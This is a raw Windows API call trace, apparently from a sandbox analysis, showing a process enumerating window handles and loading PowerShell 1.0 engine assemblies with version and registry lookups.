	[0707.598] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x440
	[0707.598] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x7e8
	[0707.598] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x730
	[0707.598] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x2c8
	[0707.598] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x31c
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x330
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x128
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x5c8
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x6f8
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x358
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x73c
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0xb0
	[0707.599] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x250
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x240
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x790
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x61c
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x540
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x538
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x568
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x538
	[0707.600] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x568
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x538
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x540
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x540
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x57c
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x460
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x554
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.601] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x528
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x79c
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4e0
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x4d0
	[0707.602] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x460
	[0707.603] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x22dd00 | out: lpdwProcessId=0x22dd00) returned 0x460
	[0710.449] WerSetFlags () returned 0x0
	[0710.459] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0710.459] CoTaskMemFree (pv=0x0) 
	[0710.460] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e068, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e060 | out: pulNumLanguages=0x22e068, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e060) returned 1
	[0710.460] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e068, pwszLanguagesBuffer=0x2d97130, pcchLanguagesBuffer=0x22e060 | out: pulNumLanguages=0x22e068, pwszLanguagesBuffer=0x2d97130, pcchLanguagesBuffer=0x22e060) returned 1
	[0710.466] CoTaskMemAlloc (cb=0x24) returned 0x473870
	[0710.466] GetUserDefaultLocaleName (in: lpLocaleName=0x473870, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0710.466] CoTaskMemFree (pv=0x473870) 
	[0713.408] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0713.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.409] CoTaskMemFree (pv=0x3cead0) 
	[0713.411] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0713.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.411] CoTaskMemFree (pv=0x3cead0) 
	[0713.413] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0713.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.413] CoTaskMemFree (pv=0x3cead0) 
	[0713.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0713.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0713.427] SetErrorMode (uMode=0x1) returned 0x1
	[0713.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22dce0 | out: lpFileInformation=0x22dce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0713.427] SetErrorMode (uMode=0x1) returned 0x1
	[0713.428] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22df50 | out: lpdwHandle=0x22df50) returned 0x94c
	[0713.429] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d9a9c0 | out: lpData=0x2d9a9c0) returned 1
	[0713.430] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22dec8, puLen=0x22dec0 | out: lplpBuffer=0x22dec8*=0x2d9aa5c, puLen=0x22dec0) returned 1
	[0713.430] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9ab38, puLen=0x22de30) returned 1
	[0713.430] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0713.430] CoTaskMemAlloc (cb=0x2e) returned 0x47e790
	[0713.430] lstrcpyW (in: lpString1=0x47e790, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0713.430] CoTaskMemFree (pv=0x47e790) 
	[0713.430] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9ab8c, puLen=0x22de30) returned 1
	[0713.430] lstrlenW (lpString="System.Management.Automation") returned 28
	[0713.430] CoTaskMemAlloc (cb=0x3c) returned 0x47cf40
	[0713.430] lstrcpyW (in: lpString1=0x47cf40, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0713.430] CoTaskMemFree (pv=0x47cf40) 
	[0713.431] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9abe8, puLen=0x22de30) returned 1
	[0713.431] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0713.431] CoTaskMemAlloc (cb=0x20) returned 0x4090d0
	[0713.431] lstrcpyW (in: lpString1=0x4090d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0713.431] CoTaskMemFree (pv=0x4090d0) 
	[0713.431] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9ac28, puLen=0x22de30) returned 1
	[0713.431] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0713.431] CoTaskMemAlloc (cb=0x44) returned 0x47cf40
	[0713.431] lstrcpyW (in: lpString1=0x47cf40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0713.431] CoTaskMemFree (pv=0x47cf40) 
	[0713.431] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9ac90, puLen=0x22de30) returned 1
	[0713.431] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0713.431] CoTaskMemAlloc (cb=0x76) returned 0x412220
	[0713.431] lstrcpyW (in: lpString1=0x412220, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0713.431] CoTaskMemFree (pv=0x412220) 
	[0713.431] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9ad2c, puLen=0x22de30) returned 1
	[0713.431] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0713.432] CoTaskMemAlloc (cb=0x44) returned 0x47cf40
	[0713.432] lstrcpyW (in: lpString1=0x47cf40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0713.432] CoTaskMemFree (pv=0x47cf40) 
	[0713.432] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9ad90, puLen=0x22de30) returned 1
	[0713.432] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0713.432] CoTaskMemAlloc (cb=0x58) returned 0x3cc750
	[0713.432] lstrcpyW (in: lpString1=0x3cc750, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0713.432] CoTaskMemFree (pv=0x3cc750) 
	[0713.432] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9ae0c, puLen=0x22de30) returned 1
	[0713.432] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0713.432] CoTaskMemAlloc (cb=0x20) returned 0x4090d0
	[0713.432] lstrcpyW (in: lpString1=0x4090d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0713.432] CoTaskMemFree (pv=0x4090d0) 
	[0713.432] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x2d9aab4, puLen=0x22de30) returned 1
	[0713.432] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0713.432] CoTaskMemAlloc (cb=0x66) returned 0x479110
	[0713.432] lstrcpyW (in: lpString1=0x479110, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0713.432] CoTaskMemFree (pv=0x479110) 
	[0713.433] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x0, puLen=0x22de30) returned 0
	[0713.433] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x0, puLen=0x22de30) returned 0
	[0713.433] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22de38, puLen=0x22de30 | out: lplpBuffer=0x22de38*=0x0, puLen=0x22de30) returned 0
	[0713.433] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22de08, puLen=0x22de00 | out: lplpBuffer=0x22de08*=0x2d9aa5c, puLen=0x22de00) returned 1
	[0713.433] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0713.433] VerLanguageNameW (in: wLang=0x0, szLang=0x414760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0713.433] CoTaskMemFree (pv=0x414760) 
	[0713.433] VerQueryValueW (in: pBlock=0x2d9a9c0, lpSubBlock="\\", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2d9a9e8, puLen=0x22de50) returned 1
	[0713.441] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0713.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.441] CoTaskMemFree (pv=0x3cead0) 
	[0713.442] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0713.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.443] CoTaskMemFree (pv=0x3cead0) 
	[0713.449] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dd28 | out: phkResult=0x22dd28*=0x2f0) returned 0x0
	[0713.451] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dd18 | out: phkResult=0x22dd18*=0x2f4) returned 0x0
	[0713.451] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dda8 | out: phkResult=0x22dda8*=0x2f8) returned 0x0
	[0716.044] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dcec, lpData=0x0, lpcbData=0x22dce8*=0x0 | out: lpType=0x22dcec*=0x1, lpData=0x0, lpcbData=0x22dce8*=0x56) returned 0x0
	[0716.045] CoTaskMemAlloc (cb=0x5a) returned 0x4790a0
	[0716.045] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dcbc, lpData=0x4790a0, lpcbData=0x22dcb8*=0x56 | out: lpType=0x22dcbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22dcb8*=0x56) returned 0x0
	[0716.045] CoTaskMemFree (pv=0x4790a0) 
	[0716.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0716.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0716.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0718.184] CoTaskMemAlloc (cb=0x104) returned 0x3cead0
	[0718.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cead0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0718.184] CoTaskMemFree (pv=0x3cead0) 
	[0724.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0724.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0729.594] CoTaskMemAlloc (cb=0x104) returned 0x3cebe0
	[0729.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0729.594] CoTaskMemFree (pv=0x3cebe0) 
	[0729.595] CoTaskMemAlloc (cb=0x104) returned 0x3cebe0
	[0729.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0729.596] CoTaskMemFree (pv=0x3cebe0) 
	[0731.488] CoTaskMemAlloc (cb=0x104) returned 0x3cebe0
	[0731.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.488] CoTaskMemFree (pv=0x3cebe0) 
	[0731.490] CoTaskMemAlloc (cb=0x104) returned 0x3cebe0
	[0731.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.490] CoTaskMemFree (pv=0x3cebe0) 
	[0731.490] CoTaskMemAlloc (cb=0x104) returned 0x3cebe0
	[0731.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.490] CoTaskMemFree (pv=0x3cebe0) 
	[0737.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0737.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0737.486] CoTaskMemAlloc (cb=0x104) returned 0x3cebe0
	[0737.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.486] CoTaskMemFree (pv=0x3cebe0) 
	[0737.488] CoTaskMemAlloc (cb=0x104) returned 0x3cebe0
	[0737.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.488] CoTaskMemFree (pv=0x3cebe0) 
	[0740.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0750.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0751.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0756.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0756.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0762.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
